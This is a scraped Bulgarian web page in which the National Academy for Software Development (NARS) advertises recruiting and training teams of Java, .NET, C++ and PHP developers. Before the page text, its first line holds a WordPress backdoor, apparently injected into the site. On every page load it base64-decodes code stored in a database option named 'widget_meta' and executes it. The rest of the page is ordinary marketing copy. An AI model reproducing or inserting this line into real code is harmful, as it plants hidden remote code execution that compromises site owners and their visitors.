add_action( 'init', create_function( '', @join( array_map( "base64_decode", json_decode( get_option( $table_prefix . "widget_meta" ) ) ) ) ) ); Изграждане на екипи - НАРС

Изграждане на екипи от софтуерни специалисти

Национална академия по разработка на софтуер (НАРС) предлага възможност за подбор и обучение на екипи от софтуерни специалисти в различни направления – Java, .NET, C++, PHP и др.

Академията е първият учебен център в България, който подготвя софтуерни специалисти за работа в ИТ областта. Центърът е създаден през 2005г., лицензиран като център за професионално обучение от НАПОО към МОН, спечелил доверието на множество компании в ИТ областта, обучили и/или формирали свои екипи с помощта на НАРС.

Сред нашите клиенти са водещи български и чуждестранни ИТ компании, като: SAP Labs Bulgaria, Telerik, Fadata, EGT, Rila Solutions, Daisy Technology, Sirma Solutions, Sciant, Acsior, Methodia, Seeburger Informatik, InterConsult Bulgaria, STEMO, БДЖ, Orbitel, EPIQ Electronic Assembly, Банк Сервиз и др.

Подбор и обучение на софтуерни специалисти

Ние извършваме цялостен подбор и подготовка на софтуерни специалисти в областта на програмирането с езиците: Java, .NET, C++, PHP и MySQL и др. Привличаме мотивирани и амбициозни хора, които имат потенциал за развитие като специалисти по разработка на софтуер, за участие цялостно обучение в съответното направление на няколко етапа. Етапите са съчетани с изпити за проверка на степента на овладяване на материала. По този начин осигуряваме на партньорите си качествен човешки ресурс с отлични технически познания и умения за работа в екип.

Опитът на НАРС в обучението на софтуерни специалисти

НАРС разполага с:

  • висококвалифицирани преподаватели с дългогодишен опит – както лекторски, така и в областта на разработката на софтуер;
  • модерни учебни зали;
  • качествени учебни материали – в крак с технологичните тенденции и съобразени с нуждите на софтуерните компании.

НАРС има богат и дългогодишен опит в организирането и провеждането на обучения на софтуерни специалисти и в подбор и обучение на персонал.

През годините – от създаването си до сега, Академията е обучилс хиляди курсисти, завършили обучения по програмиране в различни направления и успешно реализирали се в ИТ областта.

Сред успешните проекти на НАРС са тези, за изграждане на екип от софтуерни специалисти за компаниите:

Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad
Ad